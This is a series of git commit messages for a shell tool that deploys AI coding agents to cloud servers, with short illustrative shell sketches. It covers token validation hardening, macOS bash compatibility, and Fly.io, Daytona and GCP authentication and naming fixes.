In practice, `fly auth token` returns comma-separated multi-segment macaroon
tokens (fm2_...,fm2_...,fo1_...). The token-validation regex rejected
commas, forcing re-auth on every run. Add comma to the allowed character set.
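A minimal sketch of the widened allowlist (function name and exact charset are illustrative, not the real validator):

```shell
# Illustrative: accept comma-separated macaroon segments such as
# fm2_...,fm2_...,fo1_... — the comma is now in the allowlist.
validate_fly_token() {
  local allowed='^[A-Za-z0-9._/@: +=,-]+$'
  [[ "$1" =~ $allowed ]]
}
```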
`fly orgs list --json` returns a flat dict ({"slug": "Name"}) on some
flyctl versions, not the list/nodes format the parser expected. Detect
and handle both formats so the org picker works correctly.
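The dual-format handling can be sketched like this (a hypothetical helper, not the actual parser), normalizing both shapes to `slug<TAB>name` lines:

```shell
# Illustrative: `fly orgs list --json` may yield a flat dict
# ({"slug": "Name"}) or a list of org objects; handle both.
parse_fly_orgs() {
  python3 -c "
import json, sys
data = json.load(sys.stdin)
if isinstance(data, dict):
    for slug, name in data.items():
        print(slug + '\t' + str(name))
else:
    for org in data:
        print(str(org.get('Slug', '')) + '\t' + str(org.get('Name', '')))
"
}
```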
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Issue #1572: Replace bash 4+ ${//} pattern substitution in generate_env_config
with sed for macOS bash 3.2 compatibility.
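The portable substitution looks roughly like this (function and pattern are illustrative, not the actual generate_env_config code):

```shell
# Illustrative: replace every occurrence of a character via sed
# instead of ${var//pat/repl}, keeping old /bin/bash happy.
sanitize_key() {
  printf '%s' "$1" | sed 's/ /_/g'
}
```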
Issue #1571: Split local var=$(cmd) declarations in fly/lib/common.sh so
exit codes propagate correctly with set -e on macOS bash 3.2.
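The declare-then-assign pattern, sketched with a hypothetical function:

```shell
# Illustrative: under set -e, 'local var=$(cmd)' masks cmd's failure
# because the exit status of 'local' itself (0) wins. Declaring first
# and assigning second lets a non-zero status propagate.
get_value() {
  local out
  out=$(printf 'ok')   # a failing command here now aborts under set -e
  printf '%s' "$out"
}
```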
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Use semicolons instead of && for rm in inject_env_vars, inject_env_vars_sprite,
inject_env_vars_cb, and inject_env_vars_cloud so the temp file containing the
API key is always deleted even if ~/.zshrc doesn't exist or append fails.
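A sketch of the cleanup pattern (the function name and file layout here are illustrative, not the real inject_env_vars* code):

```shell
# Illustrative: ';' runs rm unconditionally, where '&&' would skip it
# when the append fails — so the key-bearing temp file never lingers.
append_key_to_rc() {
  local tmpfile
  tmpfile=$(mktemp)
  printf 'export API_KEY=%s\n' "$1" > "$tmpfile"
  cat "$tmpfile" >> "$HOME/.zshrc" 2>/dev/null; rm -f "$tmpfile"
}
```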
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Two fixes for persistent Fly.io auth failures:
1. shared/common.sh — _load_token_from_config():
When the saved token fails the security character check, auto-delete
the corrupt config file instead of silently returning 1. This prevents
the user from being stuck in a loop where every run loads a malformed
token (from a previous failed auth attempt) and immediately fails.
Message changed from error to warn: "Saved token is malformed —
clearing cached credentials."
2. fly/lib/common.sh — _try_flyctl_auth() and _try_fly_browser_auth():
Pipe 'fly auth token' output through 'head -1' to capture only the
first line. Newer flyctl versions may print warnings/metadata after
the token on subsequent lines; previously these got concatenated into
the token string via $() and could introduce characters that fail
the security validator (newlines stripped by _sanitize_fly_token, but
concatenated text from warning lines could contain unusual chars).
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
The _try_load_env_var regex in key-request.sh rejected tokens containing
spaces, colons, plus signs, or equals signs. This caused FlyV1 prefixed
tokens ("FlyV1 fm2_...") to fail validation during QA cycle key loading,
making Fly.io always appear as a missing key provider.
Updated regex to match _load_token_from_config in shared/common.sh which
already allows these characters.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
printf -v requires bash 4.0+; macOS ships bash 3.2, causing _try_load_env_var()
to fail with 'printf: -v: invalid option' and breaking saved API key loading for
all cloud providers. Both var_name and val are validated against strict regexes
immediately above, so export "NAME=VALUE" is injection-safe and works on bash 3.2+.
The macos-compat linter already flags this pattern as an MC013 error.
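A sketch of the bash 3.2-safe assignment (names illustrative; the real code validates with its own stricter regexes first):

```shell
# Illustrative: dynamic assignment-plus-export without printf -v.
# Safe only because the name is checked against an identifier pattern.
export_validated() {
  local var_name="$1" val="$2"
  [[ "$var_name" =~ ^[A-Z_][A-Z0-9_]*$ ]] || return 1
  export "$var_name=$val"
}
```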
Agent: team-lead
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The _load_token_from_config regex (added in #1547) rejects tokens
containing spaces, but Fly.io browser OAuth tokens are saved with
a "FlyV1 " prefix (e.g., "FlyV1 fm2_xxx"). This causes the token
to be silently rejected on reload, forcing re-authentication every
session. Space is safe inside curl -K double-quoted header values.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: replace eval with declare and add base64 validation (issues #1554, #1555)
- shared/key-request.sh: replace eval with declare for defense-in-depth
(eval avoided when safer declare alternative exists; validated vars stay safe)
- fly/lib/common.sh: add base64 output alphabet validation before shell
interpolation, matching daytona/lib/common.sh proven-safe pattern
Fixes #1554. Fixes #1555.
Agent: team-lead
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: use printf -v instead of declare for safe variable assignment in key-request.sh
Addresses security review feedback on PR #1557. The declare approach
created a local variable whose export had no effect outside the function.
printf -v assigns directly in the current scope without eval or command
substitution.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: validate token characters in _load_token_from_config to prevent curl injection
Tokens loaded from ~/.config/spawn/{cloud}.json were exported without
character validation. A tampered config file containing a token with
embedded newlines could exploit the _curl_api function's -K - (stdin
config) mechanism to inject arbitrary curl directives (e.g., output,
url), since curl interprets newlines in the config format as directive
separators.
Add allowlist validation (^[a-zA-Z0-9._/@:-]+$) matching the pattern
already used in key-request.sh _try_load_env_var and validate_api_token,
making all three token-loading paths consistent.
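The check can be sketched as follows (helper name illustrative; the allowlist is the one quoted above):

```shell
# Illustrative: a token containing a newline would otherwise start a
# fresh directive line in curl's -K - (stdin config) input.
token_is_clean() {
  local allowed='^[a-zA-Z0-9._/@:-]+$'
  [[ "$1" =~ $allowed ]]
}
```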
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: address review feedback on token validation PR
- Update backslash test to expect validation failure (backslashes not
valid in any known API token format; the old expectation was wrong
after validation was added)
- Fix test so exit code comes from _load_token_from_config directly,
not the trailing echo which always exits 0
- Add comment in shared/common.sh explaining why the pattern includes
colon vs key-request.sh pattern (Fly.io FlyV1 tokens use colons)
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: address review feedback — widen token charset for base64 segments
The original regex rejected + and = which are valid base64 characters
found in API tokens (e.g. sk-or-v1-abc/def+ghi==). This caused a
pre-existing test to fail. Widen the allowlist to include + and =
while keeping the security comment documenting the pattern difference
with key-request.sh.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Token validation functions (test_hcloud_token, test_do_token,
test_daytona_token, _validate_fly_token) contain rich diagnostic
log_error/log_warn messages with error details and fix instructions.
Calling them with 2>/dev/null silently discarded all that output,
leaving users with no explanation when their token was rejected.
shared/common.sh — ensure_api_token_with_provider():
Remove 2>/dev/null from "${test_func}" in both the env-var and
config-file validation branches, so callers like test_hcloud_token
can print API error details and remediation steps.
fly/lib/common.sh — ensure_fly_token():
Remove 2>/dev/null from both _validate_fly_token calls (config-file
path and post-browser-OAuth path) so users see why validation failed.
Note: Issue 1 (API polling in _poll_instance_once) is intentionally
left with 2>/dev/null — suppressing curl errors during a 60-iteration
polling loop prevents terminal flooding and is handled by '|| true'.
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
Pass field names via sys.argv instead of interpolating bash variables
directly into Python source strings in extract_ssh_key_ids() and
_load_json_config_fields(). This aligns with the secure pattern already
used elsewhere (e.g., _try_load_env_var in key-request.sh).
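The argv-passing pattern, sketched with a hypothetical helper:

```shell
# Illustrative: the field name rides in sys.argv, so no bash variable
# is ever spliced into the Python source text.
read_json_field() {
  python3 -c "
import json, sys
with open(sys.argv[1]) as f:
    print(json.load(f).get(sys.argv[2], ''))
" "$1" "$2"
}
```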
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
printf -v was introduced in bash 4.0 but macOS ships bash 3.2.
_update_retry_interval() in shared/common.sh used printf -v and is called
from generic_ssh_wait and _cloud_api_retry_loop — meaning ALL SSH
connectivity checks and cloud API retries would fail on macOS with:
"printf: -v: invalid option"
Changes:
- shared/common.sh: replace printf -v with eval in _update_retry_interval()
- shared/common.sh: remove dead code in calculate_retry_backoff() where
next_interval was computed but never used
- shared/key-request.sh: same printf -v fix
- test/macos-compat.sh: add MC013 rule to catch printf -v in future
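The eval-based stand-in can be sketched like this (name illustrative; safe only because the variable name is a validated identifier):

```shell
# Illustrative replacement for printf -v on old bash: the value is
# referenced as \$2 inside the eval'd string, never interpolated.
assign_var() {
  local var_name="$1"
  [[ "$var_name" =~ ^[a-zA-Z_][a-zA-Z0-9_]*$ ]] || return 1
  eval "$var_name=\$2"
}
```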
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
shared/common.sh — prompt_spawn_name():
Replace log_info with safe_read so user confirms (or overrides) the
derived kebab-case resource name before it's used for any cloud resource:
Spawn name (e.g. "My Dev Box"): My Claude Box
Resource name [my-claude-box]: ⏎ ← press Enter to accept
fly/lib/common.sh — _try_fly_browser_auth():
- Print auth URL prominently on its own line (not just as a warning)
so sandbox users can copy-paste it into their local browser
- Suppress open_browser errors (|| true) so the script doesn't abort
if no browser is available
- Add explicit sandbox hint while polling
- After 120s timeout: offer manual API token entry as a last resort
with a direct link to fly.io/dashboard → Tokens
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
Prevent cloud provider API tokens from being visible in ps aux output by passing Authorization headers via curl's -K - (config from stdin) instead of command-line arguments.
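A minimal sketch of the technique (helper name illustrative):

```shell
# Illustrative: emit the Authorization header as a curl config line;
# piping it to `curl -K -` keeps the token out of the process table.
auth_header_config() {
  printf 'header = "Authorization: Bearer %s"\n' "$1"
}
# usage: auth_header_config "$TOKEN" | curl -sS -K - "$API_URL"
```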
* fix: Daytona SSH gateway compatibility — resource overrides, base64 uploads, connection throttling
Daytona's SSH gateway has several limitations that caused hangs and failures:
1. **Resource overrides require image-based creation**: Snapshot-based sandboxes
reject cpu/memory/disk fields. Use buildInfo.dockerfileContent (FROM image)
to switch to image-based creation, which unlocks resource overrides.
Default: 2 vCPU, 4 GiB RAM, 30 GiB disk (configurable via env vars).
2. **SCP/SFTP not supported**: Gateway returns HTTP 404 for SCP subsystem.
Upload files via base64-encoded SSH command channel instead.
3. **Connection limit (~10-15 per token)**: Consolidated wait_for_cloud_init
from 6 SSH calls into 1. Added 1s sleep between SSH operations to let
the gateway release connection slots.
4. **Port flag incompatibility**: Changed -p PORT to -o Port=PORT so the
port works for both ssh and scp (scp interprets -p as preserve timestamps).
5. **install_claude_code improvements**: Added npm as install method (most
reliable for global installs), added .npm-global/bin to PATH.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review — escape remote_path, validate image name
- upload_file: escape single quotes in remote_path before embedding in
the SSH command string (b64 content is inherently safe — base64 alphabet
is [A-Za-z0-9+/=] only, no shell metacharacters)
- create_sandbox: validate DAYTONA_IMAGE against [a-zA-Z0-9./:_-] to
reject malformed image names before sending to the API
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden upload_file() — validate base64 + use printf %q for paths
Address security review feedback on PR #1517:
CRITICAL: Add explicit base64 alphabet validation before embedding
encoded content in SSH command string. While base64 output is
inherently safe ([A-Za-z0-9+/=]), the validation guards against
corrupted/unexpected encoder output.
MEDIUM: Replace manual single-quote escaping for remote_path with
printf %q, which is the standard shell-safe escaping mechanism and
handles all special characters including path traversal attempts.
Tests: 110/110 pass, bash -n clean.
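A hypothetical reconstruction of the hardened pattern (not the real upload_file, which also handles transport):

```shell
# Illustrative: validate the base64 alphabet, shell-quote the path with
# printf %q, then assemble the remote command string.
build_upload_cmd() {
  local b64="$1" remote_path="$2" quoted
  [[ "$b64" =~ ^[A-Za-z0-9+/=]+$ ]] || return 1
  quoted=$(printf '%q' "$remote_path")
  printf 'printf %%s %s | base64 -d > %s' "$b64" "$quoted"
}
```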
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
- ensure_api_token_with_provider now validates env-var tokens with
the provider test function, matching config-file token behavior.
Previously, stale env-var tokens silently passed auth and failed
at server creation with cryptic API errors.
- Add prompt_spawn_name to Hetzner and Daytona cloud_authenticate,
matching the pattern used by AWS, Fly, GCP, DigitalOcean, and
Sprite. Without this, SPAWN_NAME_KEBAB is never set and server
name prompts have no pre-filled default on these two providers.
- Remove redundant register_cleanup_trap from DigitalOcean
cloud_authenticate. shared/common.sh auto-registers the trap at
source time (line 3696), making the explicit call dead code.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
After an SSH/exec session ends, the post-session summary warns users
their server is still running and directs them to the cloud dashboard.
It never mentions `spawn delete`, the CLI's own deletion command.
Add a "spawn delete" hint to both _show_post_session_summary (SSH
clouds) and _show_exec_post_session_summary (exec clouds) so users
discover the feature at the moment they most need it.
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: switch Codex wire_api from "responses" to "chat" for multi-turn stability
The Responses API format causes "Invalid Responses API request" errors on
the second turn and beyond — conversation history items round-trip through
OpenRouter with null content fields and missing IDs that fail validation.
Chat Completions format is fully supported and avoids this issue.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pin Codex to 0.94.0 + wire_api=chat for multi-turn stability
OpenRouter's Responses API proxy drops required fields (id, content) from
conversation-history items on multi-turn requests, causing "Invalid
Responses API request" at input[6]+. Codex >=0.97.0 removed wire_api=chat
support (openai/codex#10157), so we pin to 0.94.0 — the last release where
Chat Completions format still works.
Tracking: https://github.com/openai/codex/issues/12114
TODO: unpin once OpenRouter /responses handles round-trip correctly.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: rewrite hetzner common.sh + fix token prompt bug in shared/common.sh
Hetzner: rewrote from 621 to 224 lines. Removed hcloud CLI dual-path
fallback, server type validation/fallback chain (11 functions), and
duplicate CLI+API implementations. Now API-only like DigitalOcean.
Shared: fixed echo "" in _prompt_for_api_token, get_openrouter_api_key_manual,
and get_openrouter_api_key_oauth writing to stdout instead of stderr.
These functions are called inside $(...) command substitutions, so the
newlines got prepended to the captured token, causing "unable to
authenticate" errors when pasting tokens at the prompt.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: rewrite daytona common.sh — API-only, drop CLI dependency
Rewrote from 312 to 174 lines. Removed daytona CLI dependency in
favor of direct REST API calls. Matches the same API-only pattern
used by Hetzner, DigitalOcean, and other clouds.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass SSH port to control master exit in daytona interactive/destroy
The ssh -O exit command to close the multiplexed master was missing
the -p PORT flag when DAYTONA_SSH_PORT is set. This left the master
connection open, causing "mux_client: master did not respond" errors
when the interactive session tried to allocate a PTY.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add spawn name prompt and project confirmation to GCP flow
Ask for spawn name upfront (before auth), derive kebab-case default for
VM naming, and confirm the current GCP project before using it.
New interaction order:
1. Spawn name: "My Dev Box" → kebab "my-dev-box" exported as
GCP_INSTANCE_NAME_KEBAB
2. gcloud auth + project confirm: "Current project: X Keep? [Y/n]"
If no → project picker shown
3. SSH key
4. Machine type picker (existing)
5. Zone picker (existing)
6. Instance name prompt: "Instance name [my-dev-box]: "
User can press Enter to accept or type a custom name
New functions:
_to_kebab_case() — lowercases, replaces non-alnum with hyphens
_gcp_prompt_spawn_name() — prompts for display name, exports kebab default;
honours SPAWN_NAME env var set by CLI (--name flag)
Modified:
_gcp_resolve_project() — adds Y/n confirmation when project already set
get_server_name() — shows kebab default in prompt, accepts Enter
cloud_authenticate() — calls _gcp_prompt_spawn_name first
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn name prompt to all clouds via shared/common.sh
Move _to_kebab_case() and prompt_spawn_name() to shared/common.sh so all
clouds get upfront spawn name prompting and kebab-based resource naming.
shared/common.sh:
+ _to_kebab_case() — "My Dev Box" → "my-dev-box"
+ prompt_spawn_name() — asks for display name, exports SPAWN_NAME_DISPLAY
and SPAWN_NAME_KEBAB; skips if already set;
honours SPAWN_NAME env var from CLI --name flag
~ get_resource_name() — replaces silent SPAWN_NAME fallback with a visible
prefilled default: "Enter server name [my-dev-box]: "
Per-cloud changes (cloud_authenticate gains prompt_spawn_name first):
hetzner, fly, aws, daytona, digitalocean, sprite — one-line change each
gcp/lib/common.sh:
- Remove _to_kebab_case() (now in shared)
- Remove _gcp_prompt_spawn_name() (now in shared as prompt_spawn_name)
~ cloud_authenticate: _gcp_prompt_spawn_name → prompt_spawn_name
~ get_server_name: simplified back to get_validated_server_name
(shared get_resource_name now shows the kebab default in the prompt)
Result — every cloud shows this flow upfront:
Spawn name (e.g. "My Dev Box"): My Claude Box
ℹ Resource name: my-claude-box
...
Enter server name [my-claude-box]: ⏎
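The kebab-case derivation above can be sketched as (illustrative; the shared helper may differ in edge cases):

```shell
# Illustrative: "My Dev Box" -> "my-dev-box". Lowercase, collapse
# non-alphanumeric runs to hyphens, trim leading/trailing hyphens.
to_kebab_case() {
  printf '%s' "$1" \
    | tr '[:upper:]' '[:lower:]' \
    | sed -e 's/[^a-z0-9]\{1,\}/-/g' -e 's/^-//' -e 's/-$//'
}
```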
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* fix: use "Use project '...'?" instead of "Keep this project?" in GCP prompt
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* feat: add spawn pick to _display_and_select in shared/common.sh
All clouds using interactive_pick (Hetzner, DigitalOcean, AWS, fly, etc.)
now get the arrow-key picker UI when the user runs via `spawn`.
Placement: between fzf (rarely installed) and numbered list (plain fallback).
Priority: fzf > spawn pick > numbered list.
Pipe-delimited items "id|field2|field3..." are converted to tab-delimited
"id\tid\tfield2 · field3 · ..." so spawn pick displays:
> cx22 2 vCPU · 4.0 GB RAM · 40 GB disk · shared · $ 0.0057/hr
> fsn1 Falkenstein · DE
The --default flag uses default_id when set, otherwise default_value,
so the correct item is pre-selected when the picker opens.
No 2>/dev/tty redirect (avoids the zsh 'file exists' failure that broke
the GCP picker; spawn pick opens /dev/tty internally via fs.openSync).
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
* refactor: replace custom _gcp_interactive_pick with shared interactive_pick
- Remove _gcp_interactive_pick (60 lines of custom picker logic)
- Convert option functions to pipe-delimited format (id|detail)
to match what interactive_pick / _display_and_select expect
- Replace _gcp_pick_{machine_type,zone,project} with direct
interactive_pick calls — same pattern as Hetzner
- _gcp_project_options: awk now outputs id|name instead of id\tid\tname
GCP now gets fzf → spawn pick → numbered list for free via the
shared helper, with no cloud-specific picker code.
Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
The json_escape fallback (used when python3 is unavailable) only escaped
backslashes and double quotes, producing invalid JSON when input contained
newlines, tabs, or carriage returns. This could cause JSON injection in
API request bodies sent to cloud providers (Hetzner, DigitalOcean, Fly.io)
and corrupt credential config files.
Add escaping for \n, \r, and \t in the fallback path. The python3 primary
path (json.dumps) was already correct.
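A sketch of the widened fallback escaper (illustrative; the real helper's name and scope may differ):

```shell
# Illustrative: escape backslashes and quotes via sed, then let awk
# rewrite tabs, carriage returns, and line breaks as \t, \r, \n.
json_escape_fallback() {
  printf '%s' "$1" \
    | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g' \
    | awk 'BEGIN { ORS = "" }
           NR > 1 { print "\\n" }
           { gsub("\t", "\\\\t"); gsub("\r", "\\\\r"); print }'
}
```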
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove backslash before $ in regex pattern so it anchors to end-of-string
rather than matching a literal dollar sign. This restores proper validation
of OAuth codes (16-128 alphanumeric chars only).
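The corrected anchor, sketched with a hypothetical validator:

```shell
# Illustrative: a bare '$' anchors to end-of-string, so nothing may
# trail the 16-128 alphanumerics; '\$' would match a literal dollar.
valid_oauth_code() {
  local pat='^[a-zA-Z0-9]{16,128}$'
  [[ "$1" =~ $pat ]]
}
```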
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* fix: persist gh auth credentials to disk for interactive sessions
When GITHUB_TOKEN is in the environment, gh auth status returns success
(gh checks env vars first), so ensure_gh_auth() short-circuits before
gh auth login --with-token writes credentials to ~/.config/gh/hosts.yml.
The interactive session starts without GITHUB_TOKEN in env, so gh reports
"not logged into any GitHub hosts".
Fix: always run gh auth login --with-token when GITHUB_TOKEN is set,
persisting credentials to disk regardless of gh auth status.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: unset GITHUB_TOKEN env var before gh auth login --with-token
gh refuses to store credentials when GITHUB_TOKEN is already set in
the environment: "The value of the GITHUB_TOKEN environment variable
is being used for authentication." Save the value, unset the env var,
pipe it to gh auth login, then re-export.
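The save/unset/login/re-export dance, as a hedged sketch (function name illustrative):

```shell
# Illustrative: gh only persists to hosts.yml when GITHUB_TOKEN is
# absent from the environment, so drop it for the login call only.
persist_gh_credentials() {
  local saved="$GITHUB_TOKEN"
  unset GITHUB_TOKEN
  printf '%s' "$saved" | gh auth login --with-token || true
  export GITHUB_TOKEN="$saved"
}
```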
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review — validate token format, skip if already persisted
- Add GITHUB_TOKEN format validation (ghp_, gho_, ghu_, ghs_, ghr_, github_pat_)
- Add fast path: check gh auth status with env var unset before persisting
- Document plaintext credential store behavior (standard gh CLI behavior)
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Codex CLI's OPENAI_BASE_URL env var approach causes "Invalid Responses
API request" errors because OpenRouter doesn't fully support the
Responses API wire format via base URL override. Switch all 8 codex
scripts to use ~/.codex/config.toml with model_provider="openrouter"
which uses the native OpenRouter integration.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Release assets use x64 not x86_64 (opencode-linux-x64.tar.gz) and
darwin not mac (opencode-darwin-arm64.tar.gz). The arch mapping only
handled aarch64→arm64 but missed x86_64→x64, causing 404 on all
x86_64 servers.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sprite npm PATH resolution and gateway timeout
Sprites use nvm-managed node, so npm global bin is at
/.sprite/languages/node/nvm/.../bin/ which isn't in default PATH.
Dynamically resolve $(npm prefix -g)/bin in install, launch, and
gateway commands for all sprite agents.
Also increase openclaw gateway timeout from 30s to 60s — gateway
starts slowly on sprites but TUI connects once ready.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: add opencode bin dir to PATH in sprite launch command
OpenCode installs to $HOME/.opencode/bin/ which isn't in the sprite's
default PATH or the npm prefix path.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: pass -o org flag to all sprite CLI commands
sprite create/exec/list/destroy fail with "authentication failed" when
the org isn't passed explicitly. Detect the selected org after login and
thread it through all sprite commands via _sprite_org_flags().
Also fix ensure_sprite_authenticated to fail loudly instead of
swallowing errors with || true.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sprite scripts fail when zsh is not available
setup_shell_environment overwrites .bashrc with `exec zsh`, but sprites
don't have zsh installed. This breaks PATH and causes all agent launch
commands that source .zshrc to fail.
- Only switch to zsh if it's actually available on the sprite
- Replace `source ~/.zshrc` with explicit PATH in all sprite agent
launch commands (openclaw, opencode, codex, kilocode)
- Fix start_openclaw_gateway to use explicit PATH instead of .zshrc
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: openclaw not found on sprite — bashrc corruption from prior runs
On reused sprites, .bashrc still has `exec /usr/bin/zsh -l` from a prior
run. Sourcing it in the install command causes `&&` to short-circuit, so
`bun install -g openclaw` never runs.
- Clean up stale `exec zsh` lines from .bashrc at start of
setup_shell_environment (fixes reused sprites)
- Use explicit PATH in openclaw install command instead of relying on
.bashrc
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use npm instead of bun for openclaw install on sprite
bun 1.3.9 on sprites fails with "connection closed" during dependency
resolution. Other sprite agents (codex, kilocode) already use npm
successfully.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: openclaw install — npm+bun fallback, verify binary exists
Try npm first (more reliable on sprites), fall back to bun, then verify
the binary is actually in PATH before continuing.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: persist npm global bin path to .spawnrc on sprites
npm installs openclaw successfully but its global bin dir isn't in the
sprite's default PATH. Detect the npm bin path after install, write it
to .spawnrc so gateway and launch commands (which source .spawnrc) find
the binary.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Point OpenClaw to https://github.com/openclaw/openclaw and OpenCode to
https://github.com/anomalyco/opencode. Update the OpenCode install command
and binary download URL to match the new repo.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
These 5 agents are being dropped from the Spawn matrix. This removes
45 agent scripts across 9 clouds, cleans the manifest, test fixtures,
READMEs, CLI source, and shared library comments.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
PR #1462 removed duplicate get_or_prompt_api_key and get_model_id_interactive
calls in spawn_agent(). PR #1468 accidentally re-introduced them with incorrect
step numbering (two "4"s and two "5"s). This doubled API validation requests on
every deployment across all 130+ agent scripts.
Also fix OVH cloud_provision not exporting OVH_SERVER_NAME, causing
save_vm_connection to record an empty server name when the user types the name
at the interactive prompt instead of passing it via env var.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
save_vm_connection built JSON via direct string interpolation, which
produces malformed output if any value contains quotes, backslashes,
or other JSON-special characters. This breaks spawn list/delete/history.
Changes:
- Use json_escape for all string fields in save_vm_connection
- Use json_escape for GCP zone/project metadata values
- Switch AWS, GCP, Daytona get_server_name to get_validated_server_name
for consistency with Hetzner, DigitalOcean, Fly, OVH
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* docs: add spawn delete command to README
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: harden openclaw across all clouds — validation, reliability, performance
Fixes multiple issues causing openclaw to break on most clouds:
Bugs fixed:
- Double-prefixed model ID (openrouter/openrouter/auto) in config generation
- AWS gateway starting without env vars (missing .zshrc source)
- DigitalOcean sourcing .spawnrc instead of .zshrc for gateway
- Destructive rm -rf ~/.openclaw on re-runs (now mkdir -p)
Validation added:
- API key checked against OpenRouter /auth/key endpoint with re-prompt on failure
- Model ID verified against OpenRouter model list with re-prompt loop
- openrouter/auto and openrouter/free bypass model check
Reliability improvements:
- Standardized gateway launch with </dev/null & disown across all 9 clouds
- Gateway log auto-displayed on startup timeout for diagnostics
- 2GB swap added to cloud-init to prevent OOM on small VMs
- Portable install timeout (10 min) with macOS gtimeout fallback
Performance:
- Reordered spawn_agent: OAuth runs while VM provisions (saves 30-60s)
- Fly.io: bumped to 2GB RAM + 2 shared CPUs for openclaw
- Fly.io: tries bun first (faster), falls back to npm
